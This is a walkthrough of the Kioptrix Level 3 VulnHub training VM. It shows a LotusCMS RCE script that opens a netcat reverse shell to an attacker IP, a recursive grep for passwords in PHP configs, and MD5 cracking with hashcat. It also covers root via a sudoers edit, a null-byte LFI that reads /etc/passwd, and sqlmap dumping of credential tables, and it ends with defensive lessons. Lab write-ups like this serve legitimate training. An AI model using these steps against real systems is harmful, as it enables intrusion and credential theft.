Kioptirx Level 3 without Metasploit (Vulnhub) Walkthough
You can download VM and practice from here
Step1 : Set up VM kali linux and Kioptrix level 3
On kali VM, network setting
->Tap ‘Adapter 1’ choose ‘NAT’
->Tab ‘Adapter 2’ choose ‘Host-Only’
On victim machine (Kioptrix level 3)
->Tab ‘Adapter 1’ choose ‘Host-Only’
Power Start both Kali machine and Victim machine
We set Host-Only to make all VMs in the same network.Now, we will discover IP victim with command ‘netdiscover -i eth1’ because we set kali machine to have virtual host on adapter 2
Step 2 : Find Victim IP by netdiscover
Step 3 : enumerate service on target IP with nmap
From nmap scan result, we found that it has port 22, 80 open.
Step 4 : Information gathering on port 80 (web service) with dirb and try check lotuscms exploit on google
To find all path on that web server, you can choose other tools like gobuster, dirbuster, wfuzz, etc.
From dirb results, we see many interesting paths as /phpmyadmin, /index.php, etc. Let’s try test on browser
On path /index.html, we will see it is login page which use by LotusCMS.I test with default password like admin:admin and root:root but it not works
I try seach Lotuscms exploit on google and found github for manual exploit that the owner adapt code from metasploit to use.You can see detail and download from https://github.com/Hood3dRob1n/LotusCMS-Exploit
Step 5 : Gain Access
After clone github to our directory already, run command
./lotusRCE.sh TargetIP/
It wil ask for attacker IP and listening port,Let’s run nc -lvnp 5151
For waiting connection to Target IP with netcat on another terminal tab
Attacker IP: 192.168.56.104, Listening port: 5151
After select 1 is NetCat -e, you will see connection success on netcat port 5151 and when we try id for check privilege,Now we are user www-data
Let’s create tty shell: python -c ‘import pty; pty.spawn(“/bin/bash”)’
we will see symbol $ but when we try cd /root.It show can’t cd it means this user is non-privilege
after we cd /home to find some important file of this user, we found another users is dreg and loneferret. Inside folder of loneferret, we see this use can run editor by sudo ht but when we try run sudo ht.It ask for password for this user
We know that this website use php.So,let’s try find some config that use format php and grep only has word password by command
find / -maxdepth 5 -name *.php -type f -exec grep -Hn password {} \; 2>/dev/null
The result show password mysql is in file /home/www/kioptrix3.com/gallery/gconfig.php.Okays, we may not see password of loneferret now but if we can access phpMyAdmin, it is possible to see all user and password in database
see content file by cat gconfig.php and found username and password
Try username: root, password: fuckeyou on phpMyAdmin
We know that all config is folder Galley.So, let’s try click at gallery
Click at dev_accounts (This table possible to have username, password)
Click at Browse, we will see hash password of user dreg and loneferret
Let’s try check format hash password with hash-identifier and the result show it is md5 hash
copy hash password from phpMyAdmin to file hash.txt and then use hashcat to crack md5 password (-m 0 is md5 in hashcat)
hashcat -m 0 -a 0 ~/vulnhub/hash.txt /usr/share/wordlists/rockyou.txt
see plaintext password in hashcat with command — show
Now. we know that user loneferret use password: starwars
But when try sudo ht,it shows error opening terminal.Okays, from nmap result we know ssh port 22 was opened.Let’s try login on ssh instread
After we ssh login success and try sudo ht again,now it shows error xterm-256color and after i check the solution to fix.It need to run export TERM=xterm
After try sudo ht again,Now we got ‘File Efit Windows Help’
Step 6 : Gain high privilege as root by edit permission file
Press button ‘F3’ for open file and put path /etc/sudoers
Because now we are low privilege user.We will add /bin/sh for this user
So,when user try run sudo /bin/sh.User will run as root
user loneferret run sudo /bin/sh and got high privilege as root
Vulnerability on php website were found as
- Local File Inclusion (LFI)
- sql injection to list all database and table
- Local File Inclusion on index file
We can check users on system from /etc/password on browser by http://example.com/index.php?page=../../../etc/passwd.You can read more on OWASP TOP 10 see vulnerability on website
but after i try http://192.168.56.106/index.php?page=../../../etc/passwd and it not works.I try solution Null byte %00 and it show result all user on this webserver.You may can put any command instread of /etc/passwd to harm this webserver
Caution: this technique pass because from nmap result show header php version is 5.2.4 (Null byte %00 can use with version < PHP 5.4)
2. SQL injection with sqlmap to see all table data username and password
From dirb scan result, we found it has path /gallery that we can access and same folder name that we check on password file.So, let’s navigate to 192.168.56.106/gallery/.You will see image can’t show and when cursor mouse on Photo_Shoot.It try to resolve hostname to ‘kioptrix3.com/gallery/p.php/5’
vim /etc/hosts and add victim IP and hosname in file
And then restart browser by open new again and call kitoptrix3.com/gallery
Now, we can see image file on this website
We try click many link on browser to see which page can use sql injection and we found after click ‘Ligoat Press Room’ and see it has Sorting options
After choose ‘Photo Id’, on browser it shows command sql sort
From browser now, we know it can sql injection.Let’s save request on Burpsuit by right click and select ‘save to file’ and put name ‘sqli1’
vim sqli1 to edit parameter from id=1 to id=1*,So, we can use sqlmap to inject all paremeter in this file
We know database name gallery from browser and when run command below to check table.We found dev_accounts that should have username and password
Now, we will dump data from table dev_accounts in database gallery
Lesson learn:
1. Password reused on both sudo user and ssh login ->It should use different password and use strong password not use md5 hash and on ssh login should use private key not plaintext password
2. Improper Access Control, Should set permission to not allow non-privilege user can edit important file like /etc/sudoers
You can try set permission by set sticky bit by chmod +t to not allow user edit or delete file
3. backend should have filter format input and not get input directly from url to make vulnerability as Local File Inclusion(LFI) and SQL injection
4. Unrestricted Upload of File with Dangerous Type because we can accces database on phpMyAdmin and run query
